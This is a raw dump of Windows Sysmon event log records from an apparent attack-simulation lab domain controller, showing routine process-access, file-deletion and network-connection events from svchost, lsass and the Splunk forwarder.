Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 
13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:10.155{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000100891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:10.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB55B02974472A5918FA12361C25B92D,SHA256=1BF34FD72B6EA736DA168F995279CB31794D3ABDD247749DC8B8B42987007AF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:11.374{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=879489F440DC16C69698FC28D7920136,SHA256=E7FB8066FFC1B5EB27A95FA4E7976487B74EC8721FE457FA3F4430B7098AE7A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:12.546{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68DFE6F3822732265D4842E2C771F5C7,SHA256=4A4ED90AA3B8AF43CD142CAF06375E6C4D5E788DEE023522807D0CC7F45E8994,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:13.640{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A3498ED2C2265996775753DA8EA7780,SHA256=C543C5F1CAC372FFD05AEA56A85190AFC3EB5A7D175D77AB32C9A736CB685914,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:11.082{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53367-false10.0.1.12-8000- 23542300x8000000000000000100932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:14.734{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C4F6A4EC50351A1CC5DC54FDF0FBB67,SHA256=DD4CCB0350979D9B914710ADE7FD01BBEBB455759798E781246F25480ED71B7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x8000000000000000100934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:15.827{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A53BF82E1BA87F290AE52E61B7FD397,SHA256=B1AF1628151267D96544A3C7CA5A898EA1ED1F6275052896D35CDA6586B135FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:16.921{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E020C6DA6E65FC9E422E3EFEDB51881,SHA256=136EB76FE999CABA995DC920D83203767DC7C0ABBD4611474CCCA6F19AAE61F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:17.796{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=DC651C76E26A5A00195DE6B03C210C66,SHA256=96597C293CBE39C92A810E21C86D27B26BBA6DFF9262465F025B86A240D9B07D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:18.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C4A0AD1874502B103E9873993F5619,SHA256=C21B7EF6259ED939239911FD9232E66842B2CCFF6A5C25626CBC6DDC2DD2BFBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:19.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B4FCEDEE3F123AC654210A61CE133F5,SHA256=74AB0DC551F7D2D0C0E422D4F0DC9E946D636D680C4E7D296F07A188DA3BB974,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:19.093{326FD73D-A254-6294-1100-000000005502}104NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1C696A5D5E4CF02BFD18EF2B7C1F46D9,SHA256=437DDC608CE1E6AF268C8727EDFEA8051DEFA882F82639404216D5D788BDCA91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:20.202{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29FAAB2958403D0EE87DC484D2DF6DA1,SHA256=C319F270164E2166A736DC804D1FD5ED6D55DCDD2625E52A231C2A2FC46300C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x8000000000000000100940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:16.145{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53368-false10.0.1.12-8000- 23542300x8000000000000000100942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:21.296{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74D4CCA2E264026150921C0A9A9BF5F1,SHA256=A5C0D843B695F5399BCDD6456FF5E72F3C8F6A91A3388AC781852D0560FA8688,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:22.390{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=441BB6DA4DD4155A0CFEFA457C7524D7,SHA256=A628071393167D26BDB3696D6A0CABFCAA6A9D0B4AD0DA278DEBAC660B8CCE8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:23.687{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B815FDBF3105A0143C61AE82F95AAF1E,SHA256=95D93950BC72E3B7DDB3127D4556C8DC830B74A59CF059DD284FB46B71551B09,IMPHASH=00000000000000000000000000000000falsefalse 
- insufficient disk space 23542300x8000000000000000100944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:23.484{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C4401C0EACDFEA77244CCB0A53AED3C,SHA256=7B6AB56C95FD30C30AF1DB57CEB4A90CFF6671C7E3DB7A39F68050F40DFAC951,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:24.577{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05854E40DBE48F6EDD700147359F5D0C,SHA256=D247B9C8B2F228BC13ED395A359345E6CDFC73F9CDCE40D3B25121BA973BF2A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:25.671{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3656203FB79F86403ED851045C9130D5,SHA256=7239F604209E11291439531407F6119D768665E66B3EB1E24503C9C0EEF1C884,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:21.598{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53369-false10.0.1.12-8089- 23542300x8000000000000000100950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:26.765{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=883DC00324367A1203808CAF9FC2D739,SHA256=14AD25ECA5FE76813E21B1F8FD72C3291E951F3C6999AC13A684758B07ED40D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:22.082{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53370-false10.0.1.12-8000- 23542300x8000000000000000100954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.859{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DD1DFEACF057213BAFEF2865896E6AD,SHA256=5D5D6CFA3773A369A204C90716194E5D00712E14111D61577C1F06AE0A2EFDAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000100953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:27.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A254-6294-1500-000000005502}1232C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:27.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A254-6294-1500-000000005502}1232C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:27.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A254-6294-1500-000000005502}1232C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000100955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:28.952{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=599044A3E9BA6A0AE97B952FED09BDF0,SHA256=D8FA499F2F177FDD8EE1BAEA3167E05BE1411A5778BBA961DF5A6C7B288480BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000100958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:29.640{326FD73D-A253-6294-0B00-000000005502}6323688C:\Windows\system32\lsass.exe{326FD73D-A251-6294-0100-000000005502}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97302|C:\Windows\system32\kerberos.DLL+79744|C:\Windows\system32\kerberos.DLL+1444f|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+2d0a6|C:\Windows\system32\lsasrv.dll+328e9|C:\Windows\system32\lsasrv.dll+30237|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+174fd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000100957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:07:29.530{326FD73D-A253-6294-0B00-000000005502}6323688C:\Windows\system32\lsass.exe{326FD73D-A254-6294-1600-000000005502}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:29.530{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A254-6294-1600-000000005502}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000100960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
